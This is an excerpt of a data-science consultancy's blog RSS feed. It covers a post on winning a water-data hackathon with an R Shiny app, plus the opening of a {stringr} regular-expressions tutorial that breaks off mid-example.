&lt;p&gt;We’re in the process of converting Jenny’s &amp;amp; Lukasz’s hard work into a nice dashboard that will be magically updated via our list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;useR groups&lt;/a&gt; and conferences. It should be ready in a few days.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/erum-competition-winners/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Water Hub Hackathon; We won!</title><link>https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/</link><pubDate>Fri, 20 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Well well well, we’ve only gone and won The Water Hub hackathon! Well, joint winners but the main word is &lt;em&gt;WINNER&lt;/em&gt;. First of all we want to say thank you to all the guys at the &lt;a href="http://www.thewaterhub.org.uk/" rel="external"&gt;Water Hub&lt;/a&gt; and the Sunderland Software Centre for organising the event and inviting us. There was some tough competition there and we are thrilled to have been adjudged joint top! Here’s how we won:&lt;/p&gt;
&lt;p&gt;The first day started off with presentations from Antonia Scarr and Matt Starr from the Environment Agency (to whom we apologise profusely for constantly harassing them about their current system and data), Martin Colling from the Wear Rivers Trust and Louise Bracken of The Water Hub. Whilst we were listening to some passionate presentations about the environment and the problem at hand, we were able to tuck into some free bacon and sausage sarnies!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-the-water-hub-hackathon-we-won"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The main problems we thought the presentations established were:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The Environment Agency have created a fantastic data exploration tool with a &lt;strong&gt;&lt;em&gt;TONNE&lt;/em&gt;&lt;/strong&gt; of data available in it &lt;em&gt;but&lt;/em&gt; it’s a little difficult to navigate and the API documentation is hard to follow. The data exploration tool along with all the data is available to view &lt;a href="http://environment.data.gov.uk/catchment-planning/" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;To help the environment, we need to engage a wide audience and encourage people to use the available data &lt;em&gt;but&lt;/em&gt; because of the difficult/scary data exploration tool it is not easy to do so.&lt;/li&gt;
&lt;li&gt;There is no way for current users of the data who want to share their insight to integrate with the existing tool directly.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We then established a few criteria our app should meet based on these presentations and a few chats with people around the room:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Ability to subscribe to data updates&lt;/li&gt;
&lt;li&gt;Better visualisation tools&lt;/li&gt;
&lt;li&gt;Ability to look at multiple regions at once&lt;/li&gt;
&lt;li&gt;Improve user experience with reduced page load times&lt;/li&gt;
&lt;li&gt;Modularity&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So we came up with a product to tackle these problems. In reality it’s a collection of more focused products that sit together through a single web application. The bonus of this is that if we then develop more tools they will just slot into the app without us having to completely redesign the whole thing.&lt;/p&gt;
&lt;p&gt;With this being a hackathon, and with less than 24 hours to design, build, re-design, and re-build our final application, this modularity allowed each of us to work on fairly independent components without worrying about breaking the others’ code.&lt;/p&gt;
&lt;p&gt;The three products that make up the app are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A map giving you the ability to choose more than one area for evaluation&lt;/li&gt;
&lt;li&gt;A simpler more consistent and visually appealing documentation for the API (This was actually added as we went along as we found the existing one to be a bit unfriendly)
&lt;ul&gt;
&lt;li&gt;The ability to explore the API in a more visual way&lt;/li&gt;
&lt;li&gt;The ability to generate example API queries in the page (which you could copy and paste into your application)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A bespoke reporting tool
&lt;ul&gt;
&lt;li&gt;This included dynamic HTML-based reports generated from regions and data sets of interest in the explorer&lt;/li&gt;
&lt;li&gt;The ability to print these reports straight to a PDF file (I still can’t believe you were copying tables and graphs over by hand.)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Here’s a cheeky picture of us being winners:&lt;/p&gt;
&lt;img class="image-center" src="hack3.jpg" style="width:500px; class:image-center"&gt;
&lt;p&gt;Quick demos of the ‘final’ product:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=SFkJDKSfSO0&amp;t=8s" rel="external"&gt;A walk through of the app and its help modes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=YWYO3PpYTBw" rel="external"&gt;A walk through of the API page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=TeggfVD1qno&amp;t=11s" rel="external"&gt;A walk through of the map and report generator pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=KR7CMV4MNq0" rel="external"&gt;A walk through of the voice command feature&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="and-a-few-of-the-more-technical-details"&gt;And a few of the more technical details:&lt;/h4&gt;
&lt;p&gt;To begin with we chose some technologies well-suited to, or designed for, implementing parameterised reporting, statistical analysis, and interactive data exploration. For us this was &lt;strong&gt;R&lt;/strong&gt; with &lt;em&gt;RStudio&lt;/em&gt;, &lt;em&gt;Shiny&lt;/em&gt;, and &lt;em&gt;R Markdown&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;RStudio allowed us to each grab bits of the catchment planning data from their APIs and explore the consistency, coverage, and general structure. Together we discovered that (1) understanding the API and data structures can initially be hard, and (2) a few small tweaks could make the experience much better for ourselves and for others who would access this data in the future. The quality of the data (once understood) was very good and would provide us plenty to work with.&lt;/p&gt;
&lt;p&gt;The first tweak was to redescribe the API with the &lt;a href="https://swagger.io/specification/" rel="external"&gt;OpenAPI Specification&lt;/a&gt;. By providing a representation of the endpoints that was both human and machine readable, we could quickly generate an interactive version of the API. This allows navigation through the data structures and also provides real-time previews of the requests required to fetch any data &lt;em&gt;and&lt;/em&gt; the results from those requests.&lt;/p&gt;
&lt;p&gt;We liked the concept of navigation through the catchment planning data via maps, but the experience could be smoother. The existing navigation tool requires selecting one of many regions on a zoomable map, and then leaving that page to see a new map where you could further select smaller regions. The necessity to reload the entire page and display a new map can hinder the user experience if the users are not already familiar with these areas. We proposed to re-use the same map while refining the region selection process, reducing page navigation and context switching.&lt;/p&gt;
&lt;p&gt;A second result of the existing design was that the refinement process is strictly hierarchical. If you wish to examine data from two neighbouring &lt;em&gt;water bodies&lt;/em&gt; (the smallest region type) you may have to navigate back to the very first page if they happen to fall across two different &lt;em&gt;river basin districts&lt;/em&gt; (the largest region type), or similarly across &lt;em&gt;management catchments&lt;/em&gt; and &lt;em&gt;operational catchments&lt;/em&gt;. Using a single map view would allow us to easily select multiple water bodies from within any parent areas. To build this interface we created a Shiny app with the Leaflet.js plugin and a little bit of customisation.&lt;/p&gt;
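&lt;p&gt;To give a flavour of the single-map selection idea, here is a minimal sketch rather than our hackathon code. It assumes the {shiny} and {leaflet} R packages; the &lt;code&gt;regions&lt;/code&gt; rectangles and their ids are made-up stand-ins for water bodies, not Environment Agency data. Clicking a shape toggles it in or out of the current selection, so any combination of regions can be chosen without leaving the map.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;shiny&amp;#34;)
library(&amp;#34;leaflet&amp;#34;)

# Hypothetical regions: two rectangles standing in for water bodies
regions = data.frame(
  id = c(&amp;#34;body-a&amp;#34;, &amp;#34;body-b&amp;#34;),
  lng1 = c(-1.70, -1.55), lat1 = c(54.90, 54.90),
  lng2 = c(-1.60, -1.45), lat2 = c(55.00, 55.00)
)

ui = fluidPage(
  leafletOutput(&amp;#34;map&amp;#34;),
  verbatimTextOutput(&amp;#34;selected&amp;#34;)
)

server = function(input, output, session) {
  # Ids of the regions selected so far
  selected = reactiveVal(character(0))

  output$map = renderLeaflet({
    map = addTiles(leaflet(regions))
    addRectangles(map, ~lng1, ~lat1, ~lng2, ~lat2, layerId = ~id)
  })

  # Shape clicks arrive as input$map_shape_click (output id plus _shape_click)
  observeEvent(input$map_shape_click, {
    id = input$map_shape_click$id
    if (id %in% selected()) {
      selected(setdiff(selected(), id))
    } else {
      selected(c(selected(), id))
    }
  })

  output$selected = renderPrint(selected())
}

app = shinyApp(ui, server)
# runApp(app) starts the app in an interactive session
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Keeping the selection in a single reactive value means a report page could read the same ids, whichever parent areas they sit in.&lt;/p&gt;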
&lt;p&gt;Finally, the reporting tools that existing users would expect from the current website were to be reproduced, but now with more control over the bodies included in each summary. Once again, Shiny and R allowed us to gather all the required data from the Environment Agency’s APIs and generate a few of the summary tables and graphics as a proof of concept. Additionally, using Shiny we could further filter the data displayed.&lt;/p&gt;
&lt;p&gt;These two Shiny apps and the interactive API run independently and are brought together by the final web UI.&lt;/p&gt;
&lt;p&gt;Final report documents can be generated from the interactive report Shiny app as it is written using R Markdown, an interpreted markup language allowing reproducibility and configurability of documents in a variety of output formats including PDF.&lt;/p&gt;
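&lt;p&gt;As an illustration of parameterised reporting with R Markdown, here is a minimal sketch under stated assumptions: the template, its &lt;code&gt;region&lt;/code&gt; parameter and the region names are hypothetical, not taken from our app. It assumes the {rmarkdown} package and pandoc are installed, and renders to HTML so that no LaTeX installation is needed; &lt;code&gt;pdf_document&lt;/code&gt; could be swapped in for PDF output.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;rmarkdown&amp;#34;)

# Hypothetical template with one parameter, written to a temporary
# file so that the sketch is self-contained
template = c(
  &amp;#34;---&amp;#34;,
  &amp;#34;title: Catchment report&amp;#34;,
  &amp;#34;params:&amp;#34;,
  &amp;#34;  region: Tyne&amp;#34;,
  &amp;#34;---&amp;#34;,
  &amp;#34;&amp;#34;,
  &amp;#34;Summary for `r params$region`.&amp;#34;
)
rmd = tempfile(fileext = &amp;#34;.Rmd&amp;#34;)
writeLines(template, rmd)

# Override the default parameter at render time;
# render() returns the path of the generated file
out = render(
  rmd,
  output_format = &amp;#34;html_document&amp;#34;,
  params = list(region = &amp;#34;Wear&amp;#34;),
  quiet = TRUE
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The same template can then be rendered once per selection of regions simply by changing the &lt;code&gt;params&lt;/code&gt; list.&lt;/p&gt;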
&lt;p&gt;We kept our code in a single git repository during development and described the requirements to run each component with a &lt;em&gt;Dockerfile&lt;/em&gt;. The Dockerfile actually describes everything required to build an environment within which the application will run, from the operating system, to the packages, any additional software, services, and configurations, and finally the application itself. A &lt;code&gt;docker-compose.yml&lt;/code&gt; file describes the relationships between our three main services allowing them to communicate with each other and the users.&lt;/p&gt;
&lt;p&gt;Of course, our presentation pitch was also produced with &lt;em&gt;R Markdown&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We’ll be writing more about our containerised workflows in a future blog post.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Regular Expressions Every R programmer Should Know</title><link>https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/</link><pubDate>Thu, 12 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Regular expressions. How they can be cruel! Well we&amp;rsquo;re here to make them a tad easier. To do so we&amp;rsquo;re going to make use of the {stringr} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;re going to use the &lt;code&gt;str_detect()&lt;/code&gt; and &lt;code&gt;str_subset()&lt;/code&gt; functions. In particular the latter. These have the syntax&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;function_name&lt;/span&gt;(STRING, REGEX_PATTERN)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;str_detect()&lt;/code&gt; is used to detect whether a string contains a certain pattern. At their most basic, these functions match literal strings of text. For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo is first&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Esther is second&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Colin - third&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;is&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So &lt;code&gt;str_detect()&lt;/code&gt; will return &lt;code&gt;TRUE&lt;/code&gt; when the element contains the pattern we searched for. If we want to return the actual strings that contain these patterns, we use &lt;code&gt;str_subset()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Theo is first&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;is&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Theo is first&amp;#34; &amp;#34;Esther is second&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To practise our regex, we&amp;rsquo;ll need some text to practise on. Here we have a vector of filenames called &lt;code&gt;files&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tmp-project.csv&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project2-csv-specs.csv&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project2.csv2.specs.xlsx&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;project-cars.R&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-houses.r&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-final.xls&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Project-final2.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I&amp;rsquo;m also going to give us a task. The task is to grab the files that have the format &amp;ldquo;project-objects&amp;rdquo; or &amp;ldquo;project_objects&amp;rdquo;. Of those files, let&amp;rsquo;s say we want only the csv and ods files, i.e. we want to grab &amp;ldquo;project_cars.ods&amp;rdquo;, &amp;ldquo;project-houses.csv&amp;rdquo; and &amp;ldquo;Project_Trees.csv&amp;rdquo;. As we introduce more regex we&amp;rsquo;ll gradually tackle our task.&lt;/p&gt;
&lt;h2 id="regex-the-backslash-"&gt;Regex: The backslash, &lt;code&gt;\&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Here we go! Our first regular expression. When typing regular expressions, there is a group of special characters called metacharacters that have special meanings rather than matching themselves. These are:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.[{()\^$|?*+
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The backslash is &lt;em&gt;SUPER&lt;/em&gt; important because if we want to search for any of these characters without using their built-in function, we must escape the character with a backslash. For example, if we wanted to extract the names of all csv files then perhaps we would think to search for the string &amp;ldquo;.csv&amp;rdquo;? Then we would do&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\.csv&amp;#34;&lt;/span&gt;)
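&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Hang on a second, that throws an error! Ah yes. The backslash is special too: it is also the escape character in R strings, and &lt;code&gt;\.&lt;/code&gt; is not an escape that R recognises. So to pass a backslash through to the regular expression, we need to escape the backslash itself!&lt;/p&gt;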
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project2.csv2.specs.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;project-houses.csv&amp;#34; &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Much better. With regard to our task, this is already useful, as we want csv and ods files. However, you&amp;rsquo;ll notice that when we searched for files containing the string &amp;ldquo;.csv&amp;rdquo;, we got a file of type &amp;ldquo;.xlsx&amp;rdquo; as well, just because it had &amp;ldquo;.csv&amp;rdquo; somewhere in its name. Up step the hat and dollar…&lt;/p&gt;
&lt;h2 id="regex-the-hat--and-dollar-"&gt;Regex: The hat, &lt;code&gt;^&lt;/code&gt;, and dollar, &lt;code&gt;$&lt;/code&gt;&lt;/h2&gt;
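&lt;p&gt;As a brief aside on why the escape matters, here is a small sketch. The vector &lt;code&gt;x&lt;/code&gt; is made up for illustration. An unescaped dot matches any character, whereas the escaped dot matches only a literal dot. The &lt;code&gt;fixed()&lt;/code&gt; helper from {stringr} is another option when no regex features are needed at all.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;stringr&amp;#34;)

# Hypothetical strings, only one of which contains a literal dot
x = c(&amp;#34;data.csv&amp;#34;, &amp;#34;data-csv&amp;#34;, &amp;#34;datacsv&amp;#34;)

# Unescaped: the dot matches any character before csv
any_char = str_detect(x, &amp;#34;.csv&amp;#34;)
## [1] TRUE TRUE TRUE

# Escaped: only a literal dot before csv matches
escaped = str_detect(x, &amp;#34;\\.csv&amp;#34;)
## [1] TRUE FALSE FALSE

# fixed() treats the whole pattern as literal text
literal = str_detect(x, fixed(&amp;#34;.csv&amp;#34;))
## [1] TRUE FALSE FALSE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;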
&lt;p&gt;The hat and dollar are used to specify the start and end of a line respectively. For instance, all file names that start with &amp;ldquo;Proj&amp;rdquo; (take note of the capital &amp;ldquo;P&amp;rdquo;!)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^Proj&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Project_Trees.csv&amp;#34; &amp;#34;Project-final2.xlsx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So what if we wanted specifically just &amp;ldquo;.csv&amp;rdquo; or &amp;ldquo;.ods&amp;rdquo; files, just like in our task? We could use the dollar to search for files ending in a specific extension&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;project2-csv-specs.csv&amp;#34; &amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.ods$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can search for files that end in certain patterns. That&amp;rsquo;s all well and good, but we still can&amp;rsquo;t search for both together. Up step round parentheses and the pipe…&lt;/p&gt;
&lt;h2 id="regex-round-parentheses-and-the-pipe-"&gt;Regex: Round parentheses, &lt;code&gt;()&lt;/code&gt;, and the pipe, &lt;code&gt;|&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Round parentheses and the pipe are best used in conjunction with each other. The parentheses specify a group and the pipe means &amp;ldquo;or&amp;rdquo;. Now, we could search for files ending in a certain extension or another extension. For our task we need &amp;ldquo;.csv&amp;rdquo; and &amp;ldquo;.ods&amp;rdquo; files. Using the pipe&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(files, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$|\\.ods$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;tmp-project.csv&amp;#34; &amp;#34;project.csv&amp;#34;&lt;/span&gt;
